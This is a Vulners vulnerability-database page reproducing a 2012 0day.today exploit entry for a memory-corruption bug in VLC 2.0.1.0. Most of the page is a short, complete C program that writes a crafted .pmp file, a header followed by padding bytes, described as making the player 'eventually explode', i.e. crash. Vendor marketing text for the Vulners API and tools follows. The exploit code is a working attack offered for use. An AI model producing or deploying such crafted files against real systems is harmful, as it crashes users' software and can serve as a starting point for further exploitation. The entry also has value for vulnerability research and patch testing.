Lucene search
K

VLC v. 2.0.1.0 .pmp Memory Corruption

🗓️ 15 Mar 2012 00:00:00Reported by Dan FoscoType 
zdt
 zdt
🔗 0day.today👁 21 Views

VLC 2.0.1.0 .pmp Memory Corruption vulnerabilit

Code
# Exploit Title: VLC v. 2.0.1.0 .pmp Memory Corruption
# Date: 3/15/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

Tested on stable 2.0, 2.0.1.0 (newest release as of 3/15/2012), not working on 1.1.11

#include <stdio.h>

int main()
{
	FILE *f;
	int i;
	f = fopen("dos.pmp", "w");
	fputs("\x70\x6d\x70\x6d\x01", f);
	for(i = 0; i < 9; i++)
	{
		fputc('\x00', f);
	}
	for(i = 0; i < 41; i++)
	{
		fputc('\x41', f);
	}
	fclose(f);
	return 0;
}

//use code for creating malicious file, eventually explodes



#  0day.today [2018-03-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Mar 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8
21